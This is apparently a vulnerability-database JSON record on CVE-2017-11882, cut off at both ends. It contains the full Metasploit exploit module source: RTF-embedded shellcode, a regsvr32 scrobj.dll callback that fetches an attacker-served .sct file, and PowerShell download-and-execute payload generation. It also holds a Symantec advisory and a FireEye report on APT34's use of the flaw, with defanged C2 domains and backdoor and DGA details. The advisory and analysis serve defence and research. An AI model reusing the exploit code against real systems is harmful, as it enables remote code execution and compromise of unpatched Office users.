"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-14T17:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the \u201cWinExec\u201d function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the \u201cWinExec\u201d function.\n\n \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of current logged on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.\n\nCommand\n\n| \n\nDescription\n\n| \n\nAction \n \n---|---|--- \n \n0\n\n| \n\nServer response string contains batch commands\n\n| \n\nExecute batch commands and send results back to server \n \n1\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and upload (PUT) the file to server \n \n2\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and download (GET) the file \n \nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n \nFigure 6: Powershell Screenshot Functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA.\n\n \nFigure 7: Breakdown of subdomain created by BONDUPDATER\n\n 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. Initially set to 000, then incremented by 3 after every DNS request\n 4. First 12 characters of system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in %temp% location\n * The file created will have the last two octets of the resolved IP addresses as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter\n\n| \n\nDescription \n \n---|--- \n \n0\n\n| \n\nFile contains batch commands, it executes the batch commands \n \n1\n\n| \n\nRename the temporary file as .ps1 extension \n \n2\n\n| \n\nRename the temporary file as .vbs extension \n \nTable 2: BONDUPDATER Actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\n \nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\n \nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER 